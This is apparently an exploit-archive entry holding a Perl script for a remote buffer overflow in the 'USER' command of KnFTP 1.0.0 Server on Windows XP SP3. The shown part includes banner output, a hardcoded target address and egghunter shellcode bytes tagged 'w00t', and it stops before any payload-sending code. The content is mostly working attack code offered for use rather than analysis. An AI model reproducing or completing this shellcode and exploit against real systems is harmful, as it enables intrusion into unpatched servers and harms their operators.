KnFTP 1.0.0 Server - 'USER' command Remote Buffer Overflow Exploit
# Exploit Title: KnFTP 1.0.0 Server - Remote Buffer Overflow Exploit,'USER' command
# Date: 19/9/2011
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/ - http://s3cure.gr
# Tested on: Windows XP SP3 [En]
#!/usr/bin/perl
use IO::Socket;
# Exploit Title: KnFTP 1.0.0 Server - Remote Buffer Overflow Exploit, 'USER' command.
# Date: 19/9/2011
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/ - http://s3cure.gr
# Tested on: Windows XP SP3 [En]
print "\n#----[ mr.pr0n ]---------------------------------------------------------#\n";
print "# Target App: KnFTP 1.0.0 Server #\n";
print "# Attack : Remote Buffer Overflow Exploit - 'USER' command #\n";
print "# Target OS : Windows XP Pro English [Service Pack 3]. #\n";
print "#------------------------------[ http://ghostinthelab.wordpress.com ]----#\n";
$target = "192.168.178.21";
# The egghunter.
$egghunter =
"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02".
"\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
"w00t". # <-- The 4 byte tag
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";